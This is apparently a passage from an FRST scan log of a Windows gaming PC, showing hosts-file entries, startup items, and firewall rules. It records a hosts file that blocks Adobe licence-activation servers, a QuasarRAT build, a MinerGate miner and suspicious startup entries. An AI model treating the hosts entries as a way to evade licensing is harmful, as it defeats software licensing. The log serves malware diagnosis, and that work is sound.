2017-04-03 15:31 - 2017-04-03 15:31 - 00167384 _____ () C:\Program Files (x86)\SaferVPN\bin\liblzo2-2.dll
2017-04-03 15:31 - 2017-04-03 15:31 - 00108952 _____ () C:\Program Files (x86)\SaferVPN\bin\libpkcs11-helper-1.dll
2016-10-26 18:27 - 2015-07-14 15:58 - 00097280 _____ () C:\Program Files (x86)\Zoiper\Plugins\Generic.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-301418830-272668332-706810675-1001\Software\Classes\exefile:  <==== ATTENTION
HKU\S-1-5-21-301418830-272668332-706810675-1001\Software\Classes\.exe: exefile =>  <==== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-30 10:24 - 2017-02-12 17:10 - 00009372 _____ C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 na1r.services.adobe.com
127.0.0.1 hlrcv.stage.adobe.com
127.0.0.1 lmlicenses.wip4.adobe.com
127.0.0.1 lm.licenses.adobe.com
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 vortex.data.microsoft.com
127.0.0.1 vortex-win.data.microsoft.com
127.0.0.1 telecommand.telemetry.microsoft.com
127.0.0.1 telecommand.telemetry.microsoft.com.nsatc.net
127.0.0.1 oca.telemetry.microsoft.com
127.0.0.1 oca.telemetry.microsoft.com.nsatc.net
127.0.0.1 sqm.telemetry.microsoft.com
127.0.0.1 sqm.telemetry.microsoft.com.nsatc.net
127.0.0.1 watson.telemetry.microsoft.com
127.0.0.1 watson.telemetry.microsoft.com.nsatc.net
127.0.0.1 redir.metaservices.microsoft.com
127.0.0.1 choice.microsoft.com
127.0.0.1 choice.microsoft.com.nsatc.net
127.0.0.1 df.telemetry.microsoft.com
127.0.0.1 reports.wes.df.telemetry.microsoft.com
127.0.0.1 services.wes.df.telemetry.microsoft.com
127.0.0.1 sqm.df.telemetry.microsoft.com
127.0.0.1 telemetry.microsoft.com
127.0.0.1 watson.ppe.telemetry.microsoft.com
127.0.0.1 telemetry.appex.bing.net
127.0.0.1 telemetry.urs.microsoft.com
127.0.0.1 telemetry.appex.bing.net:443
127.0.0.1 vortex-sandbox.data.microsoft.com
127.0.0.1 settings-sandbox.data.microsoft.com

There are 178 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-301418830-272668332-706810675-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Alex-PC\Desktop\717109.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: Winmgmt => 2
HKLM\...\StartupApproved\StartupFolder: => "SteelSeries Engine 3.lnk"
HKLM\...\StartupApproved\Run: => "ShadowPlay"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run: => "Speedify"
HKLM\...\StartupApproved\Run: => "Malwarebytes TrayApp"
HKLM\...\StartupApproved\Run32: => "zenvpn"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "DDP Service"
HKLM\...\StartupApproved\Run32: => "Startup Name"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\StartupFolder: => "Startup Name.lnk"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\StartupFolder: => "VisualProtector.lnk"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\StartupFolder: => "Transcoder.lnk"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\StartupFolder: => "SystemSecurity.lnk"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\StartupFolder: => "SystemCare.lnk"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\StartupFolder: => "open broadcaster software.lnk"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\StartupFolder: => "SystemSecurityH.lnk"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\StartupFolder: => "SecuritySystem.lnk"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "SaferVPN"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "SandboxieControl"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "Zoiper"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_A4EF55620818C093E8F9DCDA12039E48"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "NetLimiter"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "Ovtrics"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "Udkwmedia"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "World of Warships"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "BlueStacks Agent"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "Alnmworks"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "DDP Service"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "MinerGateGui"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "GalaxyClient"
HKU\S-1-5-21-301418830-272668332-706810675-1001\...\StartupApproved\Run: => "TunnelBear"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{837D1437-8D82-4B84-B15F-2B7D0507F6E8}] => (Allow) D:\Games\SteamLibrary\steamapps\common\DayZ\DayZ_BE.exe
FirewallRules: [{588D93B3-9208-4746-934A-EA3E82189A9E}] => (Allow) D:\Games\SteamLibrary\steamapps\common\DayZ\DayZ_BE.exe
FirewallRules: [{4717B312-E0CE-4DFF-B30D-7DAFBF7D9E21}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Hitman™\Launcher.exe
FirewallRules: [{ABD42309-FC2E-4F01-9BC3-3954156480AD}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Hitman™\Launcher.exe
FirewallRules: [{14A4A98E-6F9A-442E-A27A-F085617D15E7}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{C159ACC9-AE36-478D-B70B-5C961735F7F5}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{EB7BE877-4937-415E-BFA0-AE1F73F036AD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{3BA05AFB-D4E0-45B3-8108-1B387495011D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{F947895A-A891-4DBD-8F3D-C96605970072}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{6B94B5B7-A06D-4C9B-9448-F49DD26756A7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{66EC2D25-FB05-40CD-9EDA-7BD7F8C847D3}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{55EA4A82-CE6A-4FF6-87F6-0F0346BF61B5}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{B10FAEC8-8BC8-47C3-95B3-848DDBD666B0}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{A3A13D28-5839-4AB0-8ECE-96658B8E3094}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{DB995CF9-6651-4B6C-BB07-66F782B6F6E6}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{C85193D9-E9B8-45D6-9F81-D65D37D1DB9B}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{A1DC3304-2DC0-46BC-8091-1FF71C38D162}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [{867F40A7-E2E6-47BE-A722-346C0B22FDD8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [{5008EA7E-EFD8-4F57-B8AB-5EBD993CFD9F}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{D2F1D8E7-4DBC-41AF-8767-10B08FE4BAD7}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{67D74881-8C02-43F9-8CEE-76631385E9FC}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{E609AC55-C181-4499-84B6-D0F0F9BA4114}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{073D58B4-3222-4FBB-B739-E0B0E9FD6783}] => (Allow) D:\Games\SteamLibrary\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{BFB6EDCA-4B08-43B6-AFF1-72A58DDB8566}] => (Allow) D:\Games\SteamLibrary\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{FDE8BD09-DCA8-4AD0-932F-D6A956EA9705}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{2870F724-2DB6-48FB-8F83-E4CF42AE603B}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{DCA7F47C-FF93-4D81-AD99-269595FE515A}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [TCP Query User{324B888E-7D7D-47A5-B0EF-0D02F41DE652}C:\program files (x86)\zoiper\zoiper.exe] => (Allow) C:\program files (x86)\zoiper\zoiper.exe
FirewallRules: [UDP Query User{E6DD124F-C9E5-4001-B0E8-630DD53A2DBE}C:\program files (x86)\zoiper\zoiper.exe] => (Allow) C:\program files (x86)\zoiper\zoiper.exe
FirewallRules: [TCP Query User{89BF3CA4-5E3A-44AA-AB37-9863B75668D3}C:\program files (x86)\zoiper\zoiper.exe] => (Allow) C:\program files (x86)\zoiper\zoiper.exe
FirewallRules: [UDP Query User{E78C843B-8974-492C-BC90-4F900E218733}C:\program files (x86)\zoiper\zoiper.exe] => (Allow) C:\program files (x86)\zoiper\zoiper.exe
FirewallRules: [TCP Query User{8FEC0346-A38B-460F-83C8-043065EC0A8B}D:\games\steamlibrary\steamapps\common\grand theft auto v\gta5.exe] => (Allow) D:\games\steamlibrary\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{A17E0F87-E4EE-43D0-BAB0-3F8D3EDE2C01}D:\games\steamlibrary\steamapps\common\grand theft auto v\gta5.exe] => (Allow) D:\games\steamlibrary\steamapps\common\grand theft auto v\gta5.exe
FirewallRules: [{DBBFA35E-B9B2-4E78-A1F0-2B36C42017A8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{58889C73-3BAD-4B48-8700-1FB764BC4365}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{B8E07A3E-A8BE-4753-8E7B-D9615CE35209}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{6E8A028A-73E2-4175-9B60-A2A204212674}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{E0DCCA16-83CB-4EC9-B5EE-02F87A95C313}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [TCP Query User{128160E2-89EB-4181-9353-188D33A6F2E8}C:\program files (x86)\origin games\battlefield 1\bf1.exe] => (Block) C:\program files (x86)\origin games\battlefield 1\bf1.exe
FirewallRules: [UDP Query User{EBEDBB18-C56D-4760-B612-65458F56B971}C:\program files (x86)\origin games\battlefield 1\bf1.exe] => (Block) C:\program files (x86)\origin games\battlefield 1\bf1.exe
FirewallRules: [{4382F1CA-2197-40B7-8A5F-C83FE1163225}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 1\bf1Trial.exe
FirewallRules: [{4F7A7239-9FDB-4D44-8276-6A96DC24D490}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 1\bf1Trial.exe
FirewallRules: [{6F834C52-CC28-4C8B-8543-7BB9D3D5F833}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 1\bf1.exe
FirewallRules: [{C9AE9243-0BF9-405B-925D-A2B8E8E71A35}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 1\bf1.exe
FirewallRules: [{5B5D2145-A791-4F5B-81C0-E24A324B2D05}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{E3747024-5EED-41B1-9677-C83DEA7CB8F5}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{EF2EE339-9BFE-439F-A27F-92A7B1D8FCF1}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F0B3E557-ABBE-4DF4-8DC8-55B9B85540CD}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Tom Clancy's Rainbow Six Siege\rainbowsix.exe
FirewallRules: [{6B4FC195-DE79-457B-9C63-CF9A4A2432DE}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Tom Clancy's Rainbow Six Siege\rainbowsix.exe
FirewallRules: [{9AB85256-DEA3-4464-BEE4-4B3E7B42DDC8}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Hitman™\Launcher.exe
FirewallRules: [{73BCE94A-91EE-4B73-B356-95F007553499}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Hitman™\Launcher.exe
FirewallRules: [{ADAB146B-663A-4161-9C99-568EA8BAFD1E}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSixGame.exe
FirewallRules: [{7FC73EFE-EFF3-4D38-92FA-C88DD5FAE86E}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSixGame.exe
FirewallRules: [TCP Query User{EE8CA121-AF3B-43C7-AF83-499C293F780C}D:\games\steamlibrary\steamapps\common\dayz\dayz.exe] => (Allow) D:\games\steamlibrary\steamapps\common\dayz\dayz.exe
FirewallRules: [UDP Query User{42884BB5-8DB4-421F-8AF5-7948E80B6B7B}D:\games\steamlibrary\steamapps\common\dayz\dayz.exe] => (Allow) D:\games\steamlibrary\steamapps\common\dayz\dayz.exe
FirewallRules: [TCP Query User{8D3D1CB0-6046-484B-B06F-1AF320CEE70F}C:\program files (x86)\pp助手5.0\pphelper5.exe] => (Allow) C:\program files (x86)\pp助手5.0\pphelper5.exe
FirewallRules: [UDP Query User{CE06DCFA-E3CD-49C5-84A5-E476CBC317BE}C:\program files (x86)\pp助手5.0\pphelper5.exe] => (Allow) C:\program files (x86)\pp助手5.0\pphelper5.exe
FirewallRules: [TCP Query User{8391E379-AECD-4E1A-B2F6-85E27D470FE1}C:\program files (x86)\pp助手5.0\adevicehelpermon.exe] => (Allow) C:\program files (x86)\pp助手5.0\adevicehelpermon.exe
FirewallRules: [UDP Query User{0AAF06CC-0290-4D4F-A148-D63412A54876}C:\program files (x86)\pp助手5.0\adevicehelpermon.exe] => (Allow) C:\program files (x86)\pp助手5.0\adevicehelpermon.exe
FirewallRules: [{7540E5D1-32E1-4F72-8428-281206756375}] => (Block) C:\program files (x86)\pp助手5.0\adevicehelpermon.exe
FirewallRules: [{BEADDE9A-41E7-41DB-803D-6990AE260B8B}] => (Block) C:\program files (x86)\pp助手5.0\adevicehelpermon.exe
FirewallRules: [{F2B980F1-979F-4FC0-98BB-1991D435E34D}] => (Block) C:\program files (x86)\pp助手5.0\pphelper5.exe
FirewallRules: [{5517D354-8CF8-409C-B777-5554B673D493}] => (Block) C:\program files (x86)\pp助手5.0\pphelper5.exe
FirewallRules: [{E142E44E-1442-4AED-9F3F-F9C48A064101}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{ABC9A467-A73E-4CB3-9151-1419C2AB3983}] => (Allow) D:\Games\SteamLibrary\steamapps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{345093E7-AD4E-4AC6-89A3-8EC2503620A2}] => (Allow) D:\Games\SteamLibrary\steamapps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{50F0DA60-50BB-4A19-936C-4F664E91ADF2}] => (Allow) D:\Games\SteamLibrary\steamapps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{71F169DC-BBAE-41D8-B01E-46ECE29AF653}] => (Allow) D:\Games\SteamLibrary\steamapps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{72954DAF-9CEF-450D-9242-94024585C1BF}] => (Allow) D:\Games\SteamLibrary\steamapps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{0AD018DC-B7A3-4078-B869-1F8E6E49B7A5}] => (Allow) D:\Games\SteamLibrary\steamapps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{83683464-5471-47EF-B8A0-53839A9545FE}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{3D13FCDB-3C9D-4E34-8755-FEF78B28518F}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [TCP Query User{C7D06586-F818-4BA1-A69F-79ADE34828F3}D:\games\steamlibrary\steamapps\common\dayz\dayz_x64.exe] => (Allow) D:\games\steamlibrary\steamapps\common\dayz\dayz_x64.exe
FirewallRules: [UDP Query User{7DC73FE3-8E3D-454A-A405-7ADB2B2610AE}D:\games\steamlibrary\steamapps\common\dayz\dayz_x64.exe] => (Allow) D:\games\steamlibrary\steamapps\common\dayz\dayz_x64.exe
FirewallRules: [{4126B199-21FC-4949-86B6-204EFBC0FF20}] => (Block) D:\games\steamlibrary\steamapps\common\dayz\dayz_x64.exe
FirewallRules: [{84A684FC-A546-4BC7-9743-2125C207C3AD}] => (Block) D:\games\steamlibrary\steamapps\common\dayz\dayz_x64.exe
FirewallRules: [TCP Query User{FE26B64F-C9E1-4DEC-9F68-3B6288A3B2AA}E:\music\quasarrat-master\quasarrat-master\bin\release\quasar.exe] => (Allow) E:\music\quasarrat-master\quasarrat-master\bin\release\quasar.exe
FirewallRules: [UDP Query User{8E540767-B171-41A9-BF5F-733FF04FCF18}E:\music\quasarrat-master\quasarrat-master\bin\release\quasar.exe] => (Allow) E:\music\quasarrat-master\quasarrat-master\bin\release\quasar.exe
FirewallRules: [{7C52B2EC-0B1A-443C-8F76-C244D5DCFFC3}] => (Block) E:\music\quasarrat-master\quasarrat-master\bin\release\quasar.exe
FirewallRules: [{FCFB0301-89DC-49D2-9233-4BA69BF2D806}] => (Block) E:\music\quasarrat-master\quasarrat-master\bin\release\quasar.exe
FirewallRules: [TCP Query User{4B31EA1C-D275-446F-A20F-897FEE584703}D:\games\steamlibrary\steamapps\common\arma 3\arma3.exe] => (Allow) D:\games\steamlibrary\steamapps\common\arma 3\arma3.exe
FirewallRules: [UDP Query User{B65013D7-C27D-4B0C-90E6-CD962964F706}D:\games\steamlibrary\steamapps\common\arma 3\arma3.exe] => (Allow) D:\games\steamlibrary\steamapps\common\arma 3\arma3.exe
FirewallRules: [{B90F6F51-165F-4939-A663-AA46D716FA79}] => (Block) D:\games\steamlibrary\steamapps\common\arma 3\arma3.exe
FirewallRules: [{438118BB-F6A8-4716-B99A-E794531E3EDF}] => (Block) D:\games\steamlibrary\steamapps\common\arma 3\arma3.exe
FirewallRules: [{34732D82-F56C-4011-8675-71570BBB3470}] => (Allow) D:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{4E9860A9-3BDF-4F17-A524-691DF5EC54ED}] => (Allow) D:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{37B1A706-B09E-4E14-86FE-9A326365AF51}] => (Allow) D:\Games\World_of_Warships\worldofwarships.exe
FirewallRules: [{D9F61D8C-3C84-4B97-9B66-179C7EA96A4C}] => (Allow) D:\Games\World_of_Warships\worldofwarships.exe
FirewallRules: [{2FD66895-414A-4838-B1B9-ACEC00071727}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{53FEA9FD-F6C8-4830-B5F8-DD6308DE6863}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{FF4128A8-1E79-45AD-A6CD-341077234E2F}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{911129BC-78B0-4697-B1A4-817F5CC468C6}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{FA06A7E6-F379-435E-B450-2AA091C369B9}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{21D29324-8977-4194-83D9-0FF342180746}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{8CF2CA50-6E94-4834-B900-F762F41166A2}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{39EA7143-AC1E-4926-973F-0D7C486F1228}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{294B5211-9FBA-46F8-A75E-C6DAD3BE0684}] => (Allow) D:\Games\Company of Heroes 2\RelicCoH2.exe
FirewallRules: [{67A0AB23-DE98-4947-97C8-E7C912E0DAA5}] => (Allow) D:\Games\Company of Heroes 2\RelicCoH2.exe
FirewallRules: [{0224BDB7-4D9C-49B5-A619-ED22AC7C10E7}] => (Allow) D:\Games\Company of Heroes 2\RelicCoH2.exe
FirewallRules: [{4B16E8D9-EAA3-4BDC-B6E4-B6A7017D51E3}] => (Allow) D:\Games\Company of Heroes 2\RelicCoH2.exe
FirewallRules: [TCP Query User{2CA4643E-2F57-4872-89B0-9A49A46A3E14}D:\games\company of heroes 2.digital collector's edition.v 3.0.0.9704 + 26 dlc\reliccoh2.exe] => (Allow) D:\games\company of heroes 2.digital collector's edition.v 3.0.0.9704 + 26 dlc\reliccoh2.exe
FirewallRules: [UDP Query User{EBA078BC-4D44-46F3-97BA-687FC427A2FB}D:\games\company of heroes 2.digital collector's edition.v 3.0.0.9704 + 26 dlc\reliccoh2.exe] => (Allow) D:\games\company of heroes 2.digital collector's edition.v 3.0.0.9704 + 26 dlc\reliccoh2.exe
FirewallRules: [TCP Query User{8B6529B7-1E33-4E32-97FA-125D64D86DCE}D:\games\command & conquer 3 - tiberium wars\retailexe\1.9\cnc3game.dat] => (Allow) D:\games\command & conquer 3 - tiberium wars\retailexe\1.9\cnc3game.dat
FirewallRules: [UDP Query User{CEC32EAF-0AE1-4CD3-951E-E3BC26C486CB}D:\games\command & conquer 3 - tiberium wars\retailexe\1.9\cnc3game.dat] => (Allow) D:\games\command & conquer 3 - tiberium wars\retailexe\1.9\cnc3game.dat
FirewallRules: [{D8DC44A2-6806-4C22-81C9-21DD6F50199B}] => (Block) D:\games\command & conquer 3 - tiberium wars\retailexe\1.9\cnc3game.dat
FirewallRules: [{D20B9C13-9BBE-4070-93B1-F7A006FD71D5}] => (Block) D:\games\command & conquer 3 - tiberium wars\retailexe\1.9\cnc3game.dat
FirewallRules: [{D627A9F1-7996-442D-A126-8D4D5DB690EE}] => (Allow) D:\Games\Command & Conquer 3 - Tiberium Wars\RetailExe\1.9\cnc3game.dat
FirewallRules: [TCP Query User{631D7BF3-20BD-46D3-9B4E-74C386B58281}D:\games\c and c 3 kane wrath\retailexe\1.2\cnc3ep1.dat] => (Allow) D:\games\c and c 3 kane wrath\retailexe\1.2\cnc3ep1.dat
FirewallRules: [UDP Query User{0B56512B-96FF-4971-AAF0-A42E6407D4C3}D:\games\c and c 3 kane wrath\retailexe\1.2\cnc3ep1.dat] => (Allow) D:\games\c and c 3 kane wrath\retailexe\1.2\cnc3ep1.dat
FirewallRules: [{B7DF9AE0-EF3B-46FD-B47B-ECE61B7E411E}] => (Block) D:\games\c and c 3 kane wrath\retailexe\1.2\cnc3ep1.dat
FirewallRules: [{225AD903-5E42-4DA7-9483-BF9E6ACF07AC}] => (Block) D:\games\c and c 3 kane wrath\retailexe\1.2\cnc3ep1.dat
FirewallRules: [{579D5AEB-57EC-4731-95B3-1FEE4F647CDB}] => (Allow) D:\Games\C and C 3 Kane Wrath\RetailExe\1.2\cnc3ep1.dat
FirewallRules: [{CE1E18DA-AE86-4EA7-B423-DE3D0B11BA1B}] => (Allow) D:\Games\New folder\RelicCOH.exe
FirewallRules: [{7C8A2D33-2D0F-4F4D-A885-90DC1CD6B39A}] => (Allow) D:\Games\New folder\RelicCOH.exe
FirewallRules: [{4D40475C-6A93-4602-9214-D3A343A172A7}] => (Allow) D:\Games\New folder\RelicDownloader\RelicDownloader.exe
FirewallRules: [{C419D314-DC5B-468F-9CFA-33EFFED2FCCB}] => (Allow) D:\Games\New folder\RelicDownloader\RelicDownloader.exe
FirewallRules: [TCP Query User{E1999F78-9080-41CC-9671-CD926F5C1B0A}D:\games\new folder\reliccoh.exe] => (Allow) D:\games\new folder\reliccoh.exe
FirewallRules: [UDP Query User{AA08EC0D-86B3-4FB7-BCF3-88E9251E2A27}D:\games\new folder\reliccoh.exe] => (Allow) D:\games\new folder\reliccoh.exe
FirewallRules: [TCP Query User{79B5ADC8-61EF-4681-BB58-66BB9D552A20}D:\games\new folder\relicdownloader\relicdownloader.exe] => (Allow) D:\games\new folder\relicdownloader\relicdownloader.exe
FirewallRules: [UDP Query User{4096C198-F98F-404D-9467-7C3418EB4752}D:\games\new folder\relicdownloader\relicdownloader.exe] => (Allow) D:\games\new folder\relicdownloader\relicdownloader.exe
FirewallRules: [TCP Query User{76C7B659-D773-434D-8CED-B5609C5E195E}D:\games\sid meier's civilization 5\civilizationv.exe] => (Allow) D:\games\sid meier's civilization 5\civilizationv.exe
FirewallRules: [UDP Query User{EAA1A319-6904-4B33-841E-C35305D80DEB}D:\games\sid meier's civilization 5\civilizationv.exe] => (Allow) D:\games\sid meier's civilization 5\civilizationv.exe
FirewallRules: [TCP Query User{0E7F4D4A-8899-4C91-895A-FBEC7A2F91AB}D:\games\sid meier's civilization 5\civilizationv_dx11.exe] => (Allow) D:\games\sid meier's civilization 5\civilizationv_dx11.exe
FirewallRules: [UDP Query User{D3628A9B-EA55-40CF-A146-0A3903F1274D}D:\games\sid meier's civilization 5\civilizationv_dx11.exe] => (Allow) D:\games\sid meier's civilization 5\civilizationv_dx11.exe
FirewallRules: [{7FBE743C-41B1-4C70-9EDC-02C6BAB66190}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{47C27603-63DB-42E9-91F0-82BC6F4A0CF8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{AA74213D-9ABD-4E92-88C0-D23D6EC63F0B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{80E57501-E6CB-42E9-B8F7-1F777A085C53}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{3B1DE7D2-1B07-40DE-89AA-121191F91AC1}] => (Allow) D:\Steam\steamapps\common\Blackwake\Blackwake.exe
FirewallRules: [{AAAD8CD2-A055-4DAE-A177-15932EFF38E5}] => (Allow) D:\Steam\steamapps\common\Blackwake\Blackwake.exe
FirewallRules: [{875EC385-B417-46DC-A0AE-E9706473637D}] => (Allow) D:\Steam\steamapps\common\Supreme Commander Forged Alliance\bin\SupremeCommander.exe
FirewallRules: [{ADF4E8DB-D4E2-40BE-B57C-20EB845A9819}] => (Allow) D:\Steam\steamapps\common\Supreme Commander Forged Alliance\bin\SupremeCommander.exe
